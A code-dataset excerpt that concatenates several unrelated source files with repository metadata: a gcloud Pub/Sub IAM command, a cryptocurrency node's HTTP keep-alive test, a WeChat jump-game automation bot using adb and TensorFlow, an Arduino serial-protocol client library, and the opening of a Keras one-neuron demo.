from googlecloudsdk.command_lib.pubsub import resource_args
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class GetIamPolicy(base.ListCommand):
  """Get the IAM policy for a Cloud Pub/Sub Subscription."""

  detailed_help = {
      'DESCRIPTION':
          '{description}',
      'EXAMPLES':
          """\
          To print the IAM policy for a given subscription, run:

              $ {command} my-subscription
          """,
  }

  @staticmethod
  def Args(parser):
    # Positional SUBSCRIPTION argument; --uri output is not meaningful for
    # an IAM policy listing, so the flag is removed from the parser.
    resource_args.AddSubscriptionResourceArg(parser,
                                             'to get the IAM policy of.')
    base.URI_FLAG.RemoveFromParser(parser)

  def Run(self, args):
    # Resolve the subscription reference from the parsed concept args and
    # fetch its IAM policy through the Pub/Sub API client.
    client = subscriptions.SubscriptionsClient()
    subscription_ref = args.CONCEPTS.subscription.Parse()
    return client.GetIamPolicy(subscription_ref)
| 32.264151
| 74
| 0.716374
|
4a111f675355638e34ec09448135de7399c550f6
| 4,872
|
py
|
Python
|
test/functional/interface_http.py
|
criptolot/bsvcoin
|
125fc951c1bb5a87b706c5a3821a1e3252f45a3d
|
[
"MIT"
] | null | null | null |
test/functional/interface_http.py
|
criptolot/bsvcoin
|
125fc951c1bb5a87b706c5a3821a1e3252f45a3d
|
[
"MIT"
] | null | null | null |
test/functional/interface_http.py
|
criptolot/bsvcoin
|
125fc951c1bb5a87b706c5a3821a1e3252f45a3d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import BsvcoinTestFramework
from test_framework.util import assert_equal, str_to_b64str
import http.client
import urllib.parse
class HTTPBasicsTest (BsvcoinTestFramework):
    """Exercise low-level HTTP/1.1 behaviour of the JSON-RPC server:
    persistent connections, keep-alive headers and request-size limits."""

    def set_test_params(self):
        self.num_nodes = 3
        self.supports_cli = False

    def setup_network(self):
        self.setup_nodes()

    def run_test(self):
        #################################################
        # lowlevel check for http persistent connection #
        #################################################
        url = urllib.parse.urlparse(self.nodes[0].url)
        authpair = url.username + ':' + url.password
        headers = {"Authorization": "Basic " + str_to_b64str(authpair)}

        conn = http.client.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is not None  # according to http/1.1 connection must still be open!

        # send 2nd request without closing connection
        conn.request('POST', '/', '{"method": "getchaintips"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1  # must also respond with a correct json-rpc message
        assert conn.sock is not None  # according to http/1.1 connection must still be open!
        conn.close()

        # same should hold if we add keep-alive explicitly, since that is the
        # standard HTTP/1.1 behaviour anyway
        headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}

        conn = http.client.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is not None  # according to http/1.1 connection must still be open!

        # send 2nd request without closing connection
        conn.request('POST', '/', '{"method": "getchaintips"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1  # must also respond with a correct json-rpc message
        assert conn.sock is not None  # according to http/1.1 connection must still be open!
        conn.close()

        # now do the same with "Connection: close"
        headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}

        conn = http.client.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is None  # now the connection must be closed after the response

        # node1 (2nd node) is running with disabled keep-alive option
        urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
        authpair = urlNode1.username + ':' + urlNode1.password
        headers = {"Authorization": "Basic " + str_to_b64str(authpair)}

        conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1

        # node2 (third node) is running with standard keep-alive parameters,
        # which means keep-alive is on
        urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
        authpair = urlNode2.username + ':' + urlNode2.password
        headers = {"Authorization": "Basic " + str_to_b64str(authpair)}

        conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        # NOTE(review): the original comment here said "connection must be
        # closed", contradicting the assertion; the socket stays OPEN because
        # bsvcoind uses keep-alive by default.
        assert conn.sock is not None  # connection must still be open: bsvcoind uses keep-alive by default

        # Check excessive request size: ~1 KB path is merely unknown (404),
        # while a ~10 KB path exceeds the server's request limit (400).
        conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('GET', '/' + ('x'*1000), '', headers)
        out1 = conn.getresponse()
        assert_equal(out1.status, http.client.NOT_FOUND)

        conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('GET', '/' + ('x'*10000), '', headers)
        out1 = conn.getresponse()
        assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
    # Delegate to the test framework's entry point (parses args, runs run_test).
    HTTPBasicsTest ().main ()
| 44.290909
| 114
| 0.636905
|
4a111f93e4c79037823a0aad5225fad57a7854fa
| 11,662
|
py
|
Python
|
wechat_jump_auto_curves.py
|
GangHg/wechat_jump_game
|
a6139aa6d0730c62107a54fd32a500aab2db8375
|
[
"Apache-2.0"
] | null | null | null |
wechat_jump_auto_curves.py
|
GangHg/wechat_jump_game
|
a6139aa6d0730c62107a54fd32a500aab2db8375
|
[
"Apache-2.0"
] | null | null | null |
wechat_jump_auto_curves.py
|
GangHg/wechat_jump_game
|
a6139aa6d0730c62107a54fd32a500aab2db8375
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
##基于python3.5(64位)
###如果缺少scikit-image库,建议进下面网址下载whl直接安装
##https://www.lfd.uci.edu/~gohlke/pythonlibs/#scikit-image
=== 思路 ===
核心:每次落稳之后截图,根据截图算出棋子的坐标和下一个块顶面的中点坐标,
根据两个点的距离乘以一个时间系数获得长按的时间
识别棋子:靠棋子的颜色来识别位置,通过截图发现最下面一行大概是一条
直线,就从上往下一行一行遍历,比较颜色(颜色用了一个区间来比较)
找到最下面的那一行的所有点,然后求个中点,求好之后再让 Y 轴坐标
减小棋子底盘的一半高度从而得到中心点的坐标
识别棋盘:靠底色和方块的色差来做,从分数之下的位置开始,一行一行扫描,
由于圆形的块最顶上是一条线,方形的上面大概是一个点,所以就
用类似识别棋子的做法多识别了几个点求中点,这时候得到了块中点的 X
轴坐标,这时候假设现在棋子在当前块的中心,根据一个通过截图获取的
固定的角度来推出中点的 Y 坐标
最后:根据两点的坐标算距离乘以系数来获取长按时间(似乎可以直接用 X 轴距离)
"""
from __future__ import print_function, division
import sys
import time
import math
import random
from PIL import Image
from six.moves import input
from skimage import io,transform
import numpy as np
import tensorflow as tf
try:
from common import debug, config, screenshot, UnicodeStreamFilter
from common.auto_adb import auto_adb
except Exception as ex:
print(ex)
print('请将脚本放在项目根目录中运行')
print('请检查项目根目录中的 common 文件夹是否存在')
exit(1)
adb = auto_adb()
VERSION = "1.1.3"
# DEBUG switch: set True to save annotated debug screenshots, False otherwise.
DEBUG_SWITCH = False
# Magic numbers: without device-appropriate values the script may not work.
# Set them from actual screenshots; values are stored in the config folder.
config = config.open_accordant_config()
under_game_score_y = config['under_game_score_y']
# Coefficient converting jump distance to press duration; tune per device.
press_coefficient = config['press_coefficient']
# Half the height of the piece's base; may need tuning.
piece_base_height_1_2 = config['piece_base_height_1_2']
# Width of the piece's body; use a value slightly larger than measured.
piece_body_width = config['piece_body_width']
target_score=1024  ## target score
total_step=30  ## number of games needed to reach the target score
start_score=100  ## score of the first game (i.e. the current score)
def set_button_position(im):
    """Randomise the swipe endpoints around the 'play again' button.

    Updates the module-level swipe coordinates consumed by jump(). The
    jitter makes the touch pattern look less mechanical.
    """
    global swipe_x1, swipe_y1, swipe_x2, swipe_y2
    width, height = im.size
    base_x = int(width / 2)
    base_y = int(1584 * (height / 1920.0))
    # Jitter each coordinate by up to +/-100 px (same draw order as before).
    start_x = int(random.uniform(base_x - 100, base_x + 100))
    start_y = int(random.uniform(base_y - 100, base_y + 100))
    end_y = int(random.uniform(start_y - 100, start_y + 100))
    end_x = int(random.uniform(start_x - 100, start_x + 100))
    swipe_x1, swipe_y1, swipe_x2, swipe_y2 = start_x, start_y, end_x, end_y
def jump(distance):
    """Long-press to jump the given pixel distance.

    Press duration is distance * press_coefficient, floored at 200 ms.
    Returns the press duration (ms) that was used.
    """
    press_time = distance * press_coefficient
    press_time = max(press_time, 200)  # 200 ms is the minimum press duration
    press_time = int(press_time)
    # A swipe between two nearby points acts as a long press on the device.
    cmd = 'shell input swipe {x1} {y1} {x2} {y2} {duration}'.format(
        x1=swipe_x1,
        y1=swipe_y1,
        x2=swipe_x2,
        y2=swipe_y2,
        duration=press_time
    )
    print('{} {}'.format(adb.adb_path, cmd))
    adb.run(cmd)
    return press_time
def find_piece_and_board(im):
    """Locate the piece and the next platform in a screenshot.

    Returns (piece_x, piece_y, board_x, board_y); all zeros when either
    the piece or the platform could not be detected.
    """
    w, h = im.size

    piece_x_sum = 0
    piece_x_c = 0
    piece_y_max = 0
    board_x = 0
    board_y = 0
    scan_x_border = int(w / 8)  # left/right margin skipped while scanning for the piece
    scan_start_y = 0  # y coordinate where the detailed scan starts
    im_pixel = im.load()

    # Probe every 50 px to find scan_start_y: the first non-uniform row.
    for i in range(int(h / 3), int(h*2 / 3), 50):
        last_pixel = im_pixel[0, i]
        for j in range(1, w):
            pixel = im_pixel[j, i]
            # Row is not a solid colour: record scan_start_y and stop probing.
            if pixel != last_pixel:
                scan_start_y = i - 50
                break
        if scan_start_y:
            break
    print('scan_start_y: {}'.format(scan_start_y))

    # Scan downwards from scan_start_y; the piece is assumed to sit in the
    # upper part of the screen, not below 2/3 of the height.
    for i in range(scan_start_y, int(h * 2 / 3)):
        # Narrow the horizontal range to cut scanning cost.
        for j in range(scan_x_border, w - scan_x_border):
            pixel = im_pixel[j, i]
            # Match the colour of the piece's bottom row and average those
            # points; the RGB window below is empirical.
            if (50 < pixel[0] < 60) \
                    and (53 < pixel[1] < 63) \
                    and (95 < pixel[2] < 110):
                piece_x_sum += j
                piece_x_c += 1
                piece_y_max = max(i, piece_y_max)

    if not all((piece_x_sum, piece_x_c)):
        return 0, 0, 0, 0
    piece_x = int(piece_x_sum / piece_x_c)
    piece_y = piece_y_max - piece_base_height_1_2  # move up by half the base height

    # Restrict the platform scan to the side opposite the piece; works
    # around the music-note artefact bug.
    if piece_x < w/2:
        board_x_start = piece_x
        board_x_end = w
    else:
        board_x_start = 0
        board_x_end = piece_x

    for i in range(int(h / 3), int(h * 2 / 3)):
        last_pixel = im_pixel[0, i]
        if board_x or board_y:
            break
        board_x_sum = 0
        board_x_c = 0

        for j in range(int(board_x_start), int(board_x_end)):
            pixel = im_pixel[j, i]
            # Skip columns near the piece: fixes the case where the piece's
            # head is taller than the next platform.
            if abs(j - piece_x) < piece_body_width:
                continue

            # Detect the platform's top edge by colour difference from the
            # background; the threshold of 10 is empirical.
            if abs(pixel[0] - last_pixel[0]) \
                    + abs(pixel[1] - last_pixel[1]) \
                    + abs(pixel[2] - last_pixel[2]) > 10:
                board_x_sum += j
                board_x_c += 1
        if board_x_sum:
            board_x = board_x_sum / board_x_c
            last_pixel = im_pixel[board_x, i]

            # From the top vertex go down +274 px and search back up for a
            # pixel matching the top-vertex colour: that is the bottom
            # vertex. Works for solid-colour faces and some patterned ones;
            # known to misjudge golf turf, wood grain, pill bottles and some
            # non-diamond discs.
            for k in range(i+274, i, -1):  # 274 = max top-bottom vertex distance at game start
                pixel = im_pixel[board_x, k]
                if abs(pixel[0] - last_pixel[0]) \
                        + abs(pixel[1] - last_pixel[1]) \
                        + abs(pixel[2] - last_pixel[2]) < 10:
                    break
            board_y = int((i+k) / 2)

            # If the previous jump hit dead centre, the next target centre
            # shows an r245 g245 b245 dot; use it to correct possible errors
            # from the block above. If a pattern prevents recognition the
            # jump may fail, but patterned areas are large so the risk is low.
            for j in range(i, i+200):
                pixel = im_pixel[board_x, j]
                if abs(pixel[0] - 245) + abs(pixel[1] - 245) + abs(pixel[2] - 245) == 0:
                    board_y = j + 10
                    break

    if not all((board_x, board_y)):
        return 0, 0, 0, 0

    return piece_x, piece_y, board_x, board_y
def yes_or_no(prompt, true_value='y', false_value='n', default=True):
    """Ask the user a yes/no question and return the answer as a bool.

    An empty first answer yields `default`; anything else is re-prompted
    until it matches `true_value` or `false_value`.
    """
    shown_default = true_value if default else false_value
    question = '{} {}/{} [{}]: '.format(prompt, true_value,
                                        false_value, shown_default)
    answer = input(question)
    if not answer:
        return default
    while True:
        if answer == true_value:
            return True
        if answer == false_value:
            return False
        retry = 'Please input {} or {}: '.format(true_value, false_value)
        answer = input(retry)
def pross_data(image):
    """Binarise a grayscale image's pixel data.

    Args:
        image: object exposing getdata() that yields 0-255 grayscale values.

    Returns:
        A list where values below 100 become 0 (ink) and all others 255
        (background).
    """
    # Comprehension replaces the original index-loop that mutated the list
    # returned by getdata(); output is identical.
    return [0 if value < 100 else 255 for value in image.getdata()]
def pixel_division(img,w,h):
pixels = list(img.getdata())
row_pix=np.zeros([1,h])
col_pix=np.zeros([1,w])
for i in range(w):
for j in range(h):
if pixels[j*w+i]<100:
row_pix[0,j]+=1
col_pix[0,i]+=1
start_h=0
end_h=0
flag=0
for j in range(h):
if row_pix[0,j]>=1 and flag==0:
start_h=j
flag=1
if row_pix[0,j]>=1:
end_h=j
pixels_Widh=[]
end_w=0
for i in range(1,w):
if col_pix[0,i-1]<=0 and col_pix[0,i]>=1:
pixels_Widh.append(i-1)
if col_pix[0,i]>=1:
end_w=i
pixels_Widh.append(end_w+1)
return start_h,end_h,pixels_Widh
def strint(score0):
    """Render a single classifier output as a score digit string.

    Values below 10 map to their decimal string; anything else maps to an
    empty string so it contributes nothing to the assembled score.
    """
    return str(score0) if score0 < 10 else ""
def read_one_image(path):
    """Load an image file and resize it to the classifier's 81x81x1 input.

    Returns the resized image as a numpy array (skimage resize output).
    """
    img = io.imread(path)
    # Target shape must match the network's input layer: 81x81, 1 channel.
    w=81
    h=81
    c=1
    img = transform.resize(img,(w,h,c))
    return np.asarray(img)
def main():
    """Main loop: recognise the on-screen score with the TF digit model,
    locate the piece/platform, and jump following a target score curve."""
    op = yes_or_no('请确保手机打开了 ADB 并连接了电脑,'
                   '然后打开跳一跳并【开始游戏】后再用本程序,确定开始?')
    if not op:
        print('bye')
        return
    print('程序版本号:{}'.format(VERSION))
    debug.dump_device_info()
    screenshot.check_screenshot()

    i, next_rest, next_rest_time = (0, random.randrange(3, 10),
                                    random.randrange(5, 10))
    j= 0

    ################ score-curve formula
    # Saturating curve approaching target_score; next_start becomes the
    # first curve index above the current start_score.
    y_score=[]
    next_start=0
    global start_score
    for i in range(total_step):
        each_score=target_score*(1-np.exp(-0.15*(1024.0/target_score)*i))
        y_score.append(each_score)
        if start_score>each_score:
            next_start=i
    next_start+=1
    #print(y_score)
    if start_score<y_score[0]:
        next_start=0
    ###################
    with tf.Session() as sess:
        # Restore the pre-trained digit classifier from checkpoint.
        saver = tf.train.import_meta_graph('./resource/model/model.ckpt.meta')
        saver.restore(sess,tf.train.latest_checkpoint('./resource/model/'))
        graph = tf.get_default_graph()
        x = graph.get_tensor_by_name("x:0")
        logits = graph.get_tensor_by_name("logits_eval:0")
        ##################### score recognition
        while True:
            screenshot.pull_screenshot()
            im = Image.open('./autojump.png')
            ## scale factors relative to a 1080-wide reference screen
            pix_w=im.size[0]*1.0/1080
            pix_h=im.size[1]
            # Crop the score area, convert to grayscale, and split it into
            # per-digit columns.
            region=im.crop((0,pix_h*0.1,460*pix_w,pix_h*0.2))
            region=region.convert('L')
            start_h,end_h,pixels_Widh=pixel_division(region,int(460*pix_w),int(pix_h*0.1))
            if start_h==end_h:
                continue
            data = []
            # Binarise each digit, save it to disk, and reload it in the
            # 81x81x1 shape the classifier expects.
            for i in range(len(pixels_Widh)-1):
                region1=region.crop((pixels_Widh[i],start_h,pixels_Widh[i+1],end_h))
                region1.putdata(pross_data(region1))
                str1="./region"+str(i)+".png"
                region1.save(str1)
                data1 = read_one_image(str1)
                data.append(data1)
            feed_dict = {x:data}
            classification_result = sess.run(logits,feed_dict)
            output = []
            output = tf.argmax(classification_result,1).eval()
            m_score=""
            for i in range(len(output)):
                m_score+=strint(output[i])
            if m_score=="":
                continue
            m_score=int(m_score)
            print('score:{}'.format(m_score))
            ####################################
            # Locate the piece and the next platform.
            print(j)
            piece_x, piece_y, board_x, board_y = find_piece_and_board(im)
            ts = int(time.time())
            print(ts, piece_x, piece_y, board_x, board_y)
            set_button_position(im)
            if m_score > y_score[next_start]:  ## deliberately overshoot to end this game
                print("----------------")
                jump(math.sqrt((board_x - piece_x) ** 2 + (board_y - piece_y) ** 2)*5)
                next_start+=1
                time.sleep(5*random.random())
                if next_start >len(y_score):
                    # NOTE(review): y_score[next_start] above can raise
                    # IndexError when next_start == len(y_score); this guard
                    # only fires one step later -- confirm intended.
                    break
            jump(math.sqrt((board_x - piece_x) ** 2 + (board_y - piece_y) ** 2))
            if DEBUG_SWITCH:
                debug.save_debug_screenshot(ts, im, piece_x,
                                            piece_y, board_x, board_y)
                debug.backup_screenshot(ts)
            im.close()
            i += 1
            j += 1
            if i == next_rest:
                print('已经连续打了 {} 下,休息 {}s'.format(i, next_rest_time))
                # NOTE(review): this inner loop reuses `j`, clobbering the
                # jump counter printed above -- confirm intended.
                for j in range(next_rest_time):
                    sys.stdout.write('\r程序将在 {}s 后继续'.format(next_rest_time - j))
                    sys.stdout.flush()
                    time.sleep(1)
                print('\n继续')
                i, next_rest, next_rest_time = (0, random.randrange(30, 100),
                                                random.randrange(10, 60))
            # Extra randomised delay so the piece has settled before the
            # next screenshot; randomness reduces ban risk.
            time.sleep(random.uniform(0.9, 1.2))
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # On Ctrl-C, shut down the adb server before exiting cleanly.
        adb.run('kill-server')
        print('bye')
        exit(0)
| 29.979434
| 90
| 0.561139
|
4a111fa13cb1124ecf8b445622087858c42c315f
| 10,143
|
py
|
Python
|
ublock/core.py
|
gwappa/python-ublock
|
bdd015c8e118cc6d49e916e65ce6ff6784a17b52
|
[
"MIT"
] | 1
|
2019-04-22T13:07:43.000Z
|
2019-04-22T13:07:43.000Z
|
ublock/core.py
|
gwappa/python-ublock
|
bdd015c8e118cc6d49e916e65ce6ff6784a17b52
|
[
"MIT"
] | null | null | null |
ublock/core.py
|
gwappa/python-ublock
|
bdd015c8e118cc6d49e916e65ce6ff6784a17b52
|
[
"MIT"
] | null | null | null |
import time
import threading
from traceback import print_tb
import serial
class protocol:
    """Single-character prefixes used for discriminating between line
    messages.

    Other than the `DELIMITER`, usages are completely up to the
    implementor.
    """
    DEBUG = '.'
    INFO = '>'
    CONFIG = '@'
    RESULT = '+'
    ERROR = '*'
    OUTPUT = '<'
    # Separates tokens within a single line.
    DELIMITER = ';'
    HELP = '?'
class iothread(threading.Thread):
    """Background reader thread: pumps bytes from a serial port and hands
    complete lines to a delegate via `connected`, `handleLine`, `closed`."""

    def __init__(self, port, delegate, waitfirst=0, initialcmd=None):
        super().__init__()
        self.port = port
        self.quitreq = False         # set True by interrupt() to stop the loop
        self.buf = b''               # accumulates bytes until a newline arrives
        self.delegate = delegate
        self.connected = False       # becomes True after the first byte is read
        self.waitfirst = waitfirst   # seconds to wait before the initial command
        self.initialcmd = initialcmd # command sent once at startup, if any
        # Read timeout so interrupt requests are noticed at least once a second.
        self.port.timeout = 1
        self.start()

    def writeLine(self, msg):
        """Send `msg` with a CRLF terminator, encoded to bytes."""
        self.port.write((msg + "\r\n").encode())

    def interrupt(self):
        """Request the thread to stop and close the port to unblock read()."""
        self.quitreq = True
        self.port.close()

    def run(self):
        # Optionally delay, then send the initial command (used with boards
        # that need time after the port opens).
        time.sleep(self.waitfirst)
        if self.initialcmd is not None:
            self.writeLine(self.initialcmd)
        try:
            while not self.quitreq:
                try:
                    ch = self.port.read()
                except serial.SerialTimeoutException:
                    continue
                # First byte seen: notify the delegate exactly once.
                if self.connected == False:
                    self.connected = True
                    self.delegate.connected()
                self.buf += ch
                if ch == b'\n':
                    # Strip the trailing CRLF before delivering the line.
                    self.delegate.handleLine(self.buf[:-2].decode().strip())
                    self.buf = b''
        except serial.SerialException:
            pass  # port closed under us; just finish the thread
        print(">port closed")
        self.delegate.closed()
class baseclient:
    """Minimal serial client that owns an iothread and exposes subclass
    hooks (`connected`, `closed`, `handleLine`). Usable as a context
    manager; the port is closed on exit."""

    def __init__(self, addr, baud=9600, waitfirst=0, initialcmd=None):
        # BUG FIX: remember the address -- request() referenced self.addr,
        # which was never assigned, raising AttributeError on the error path.
        self.addr = addr
        self.port = serial.Serial(port=addr, baudrate=baud)
        self.io = iothread(self.port, self, initialcmd=initialcmd, waitfirst=waitfirst)

    def __enter__(self):
        return self

    def __exit__(self, exc, *args):
        # args is (exc_value, traceback) per the context-manager protocol.
        # BUG FIX: print_tb() requires the traceback argument; calling it
        # with no args raised TypeError whenever an exception escaped.
        if exc is not None:
            print_tb(args[1])
        self.close()

    def connected(self):
        """Hook: called once the port starts producing data."""
        pass

    def closed(self):
        """Hook: called when the I/O thread finishes."""
        pass

    def close(self):
        # Idempotent shutdown of the reader thread and the serial port.
        if self.io is not None:
            self.io.interrupt()
            self.io.join()
            self.io = None

    def request(self, cmd):
        # Only write once the first byte has been seen (the device is up).
        if self.io is not None and self.io.connected == True:
            self.io.writeLine(cmd)
        else:
            print("***port not connected: {}".format(self.addr))

    def handleLine(self, line):
        """Hook: called with each complete decoded line."""
        pass
class eventhandler:
    """the interface class for receiving events from CUISerial protocol.

    except for `connected` and `closed`, the meaning of each type of messages
    is up to the user."""

    def connected(self, client):
        """called when a serial port is opened (does not necessarily mean
        that the port is ready for receiving commands).
        `client` stands for the corresponding `client` object."""
        pass

    def closed(self):
        """called when the connected serial port is closed."""
        pass

    def received(self, line):
        """called with a raw line that arrived at the serial port."""
        pass

    def debug(self, line):
        """called with a line carrying the DEBUG prefix."""
        pass

    def info(self, line):
        """called with a line carrying the INFO prefix."""
        pass

    def config(self, line):
        """called with a line carrying the CONFIG prefix."""
        pass

    def result(self, line):
        """called with a line carrying the RESULT prefix."""
        pass

    def error(self, line):
        """called with a line carrying the ERROR prefix."""
        pass

    def output(self, line):
        """called with a line carrying the OUTPUT prefix."""
        pass

    def message(self, line):
        """called with a line that does not fall into any of the other
        categories"""
        pass
def tokenize(line, ch=protocol.DELIMITER, has_header=True):
    """a utility function to split an input line into a chunk of tokens.

    it yields a token at a time until it reaches the end of line.

    When `has_header` is True, the first character (the protocol prefix) is
    dropped before splitting on `ch`. Trailing empty tokens are stripped;
    if nothing remains, the (header-stripped) line itself is yielded once.
    """
    if has_header == True:
        line = line[1:]
    elems = line.split(ch)
    # stripping on the right hand side; guard against the all-empty case,
    # which previously raised IndexError on elems[-1]
    while elems and len(elems[-1].strip()) == 0:
        elems = elems[:-1]
    if len(elems) == 0:
        yield line
    else:
        # BUG FIX: the original yielded only zero-length tokens
        # (`if len(elem) == 0: yield elem`), dropping every real token and
        # contradicting the docstring; yield each remaining token in order.
        for elem in elems:
            yield elem
class client(baseclient):
    """a client for serial communication that conforms to the CUISerial protocol."""

    def __init__(self, addr, handler=None, baud=9600, waitfirst=0, initialcmd=None):
        super().__init__(addr, baud=baud, waitfirst=waitfirst, initialcmd=initialcmd)
        # Fall back to the no-op handler so dispatch never needs None checks.
        if handler is None:
            handler = eventhandler()
        self.handler = handler

    @classmethod
    def Uno(cls, addr, handler=None, baud=9600, initialcmd=None):
        """default call signatures for Uno-type boards (waits 1.2 s before
        the initial command)."""
        return cls(addr, handler=handler, baud=baud, waitfirst=1.2, initialcmd=initialcmd)

    @classmethod
    def Leonardo(cls, addr, handler=None, baud=9600, initialcmd=protocol.HELP):
        """default call signatures for Leonardo-type boards (no startup
        wait; sends a HELP request by default)."""
        return cls(addr, handler=handler, baud=baud, waitfirst=0, initialcmd=initialcmd)

    def connected(self):
        self.handler.connected(self)

    def closed(self):
        self.handler.closed()

    def handleLine(self, line):
        """calls its handler's method(s) in turn, based on its first character."""
        if self.handler is None:
            return
        # Deliver the raw line first, then the category-specific callback.
        self.handler.received(line)
        line = line.strip()
        if line.startswith(protocol.DEBUG):
            self.handler.debug(line)
        elif line.startswith(protocol.INFO):
            self.handler.info(line)
        elif line.startswith(protocol.CONFIG):
            self.handler.config(line)
        elif line.startswith(protocol.RESULT):
            self.handler.result(line)
        elif line.startswith(protocol.ERROR):
            self.handler.error(line)
        elif line.startswith(protocol.OUTPUT):
            self.handler.output(line)
        else:
            self.handler.message(line)

    def close(self):
        # NOTE(review): the iothread also invokes closed() through its
        # delegate, so handler.closed() may run twice -- confirm intended.
        if self.io is not None:
            super().close()
            if self.handler is not None:
                self.handler.closed()
class loophandler:
    """the interface for classes that receive messages from `loop`."""

    def starting(self, command, number, counter):
        """invoked when single loop with index being `counter`,
        out of total number `number`, is starting"""
        pass

    def evaluate(self, result):
        """should return a boolean value whether or not to increment
        the counter, given the `result` message."""
        return True

    def request(self, command):
        """proxy for serial I/O to dispatch a request."""
        raise RuntimeError("no IO linked to: {}".format(self))

    def done(self, command, number, counter):
        """invoked when the whole loop is ending."""
        pass
class loop:
    """class that handles loop structures.

    `io` can be any `client`-type instance (that accepts `request()`).
    `handler` is supposed to be a `loophandler` object.
    both `io` and `handler` can be set later, but before calling the
    `start()` (or `run()`) method.

    note that its `run()` method by itself only specifies
    the procedure itself, and it does not run in another thread.
    by calling its `start()` method, instead, it returns a new loop
    execution thread.
    """

    def __init__(self, command, number, interval=0,
                 io=None, handler=None):
        super().__init__()
        self.command = command    # command string sent on every iteration
        self.io = io              # client-like object exposing request()
        self.number = number      # number of successful iterations required
        self.interval = interval  # seconds to sleep between iterations
        self.handler = loophandler() if handler is None else handler
        # Condition variable used to wait for updateWithMessage().
        self.update = threading.Condition()
        self.result = None        # last message passed to updateWithMessage()
        self.toabort = False      # set by abort() to stop the loop

    def start(self, init=threading.Thread):
        """starts a new thread that has this instance's `run()`
        as the target.

        the callable responsible for the thread generation
        can be specified via the `init` keyword argument
        (note that the callable must take the `target` option
        to be compatible with the threading.Thread initializer).

        returns the started thread.
        """
        thread = init(target=self.run)
        thread.start()
        return thread

    def run(self):
        counter = 0
        self.toabort = False
        while counter < self.number:
            self.handler.starting(self.command,self.number,counter)
            self.update.acquire()
            try:
                if self.io is not None:
                    self.io.request(self.command)
                    # Block until updateWithMessage() delivers a result.
                    self.update.wait()
                    if self.handler.evaluate(self.result) == True:
                        counter += 1
                    if self.toabort == True:
                        break
                else:
                    print("***no IO linked to: {}".format(self))
                    break
            finally:
                self.update.release()
            # Optional pause between repetitions.
            if (self.number > 1) and (self.interval > 0):
                time.sleep(self.interval)
        self.handler.done(self.command,self.number,counter)

    def abort(self):
        # The flag is consumed in run() after the next evaluate().
        self.update.acquire()
        self.toabort = True
        self.update.release()

    def updateWithMessage(self, msg):
        """Deliver a result message to the waiting loop and wake it up."""
        self.update.acquire()
        self.result = msg
        self.update.notify_all()
        self.update.release()
def testResult(status_set, returns='result'):
    """generates an evaluator that tests if the returned status
    starts with one of the words in `status_set`.

    intended for the use with `loophandler.evaluate()`.

    Args:
        status_set: container of accepted status words.
        returns: 'result' to match RESULT-prefixed lines, or 'config'
            for CONFIG-prefixed lines.

    Returns:
        a callable taking a raw message line and returning bool.

    Raises:
        ValueError: if `returns` is neither 'result' nor 'config'.
    """
    if returns.lower() == 'result':
        header = protocol.RESULT
    elif returns.lower() == 'config':
        header = protocol.CONFIG
    else:
        raise ValueError("'returns' currently only accepts 'result' or 'config'")

    def __evaluator(msg):
        # Keep only the first token of the line.
        if protocol.DELIMITER in msg:
            msg = msg[:(msg.index(protocol.DELIMITER))]
        # Strip the protocol prefix, if present. BUG FIX: guard against an
        # empty message, which previously raised IndexError on msg[0].
        if msg and msg[0] == header:
            msg = msg[1:]
        return (msg in status_set)
    return __evaluator
| 30.92378
| 95
| 0.578527
|
4a1120946ddcfdc38e3d759bb1d6a87a8565f053
| 1,785
|
py
|
Python
|
talks/burlingtonMeetup2019/python/one_neuron.py
|
breckbaldwin/StanIsThePlan
|
919fd9843d5e73234d582f8a33b0477a1f010887
|
[
"BSD-3-Clause"
] | 2
|
2019-08-19T19:09:43.000Z
|
2019-08-21T13:08:23.000Z
|
talks/burlingtonMeetup2019/python/one_neuron.py
|
breckbaldwin/StanIsThePlan
|
919fd9843d5e73234d582f8a33b0477a1f010887
|
[
"BSD-3-Clause"
] | null | null | null |
talks/burlingtonMeetup2019/python/one_neuron.py
|
breckbaldwin/StanIsThePlan
|
919fd9843d5e73234d582f8a33b0477a1f010887
|
[
"BSD-3-Clause"
] | null | null | null |
# One-neuron Keras demo: fit a single sigmoid unit and plot its response.
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('default')
import keras
from keras.models import Sequential
from keras.layers import Dense
from keras.utils import to_categorical
from keras import optimizers

# Two identical training examples: input 2 -> target 1.
X=np.array([2,2])
Y=np.array([1,1])

model = Sequential()
model.add(Dense(1, batch_input_shape=(None, 1),
                activation='sigmoid'))

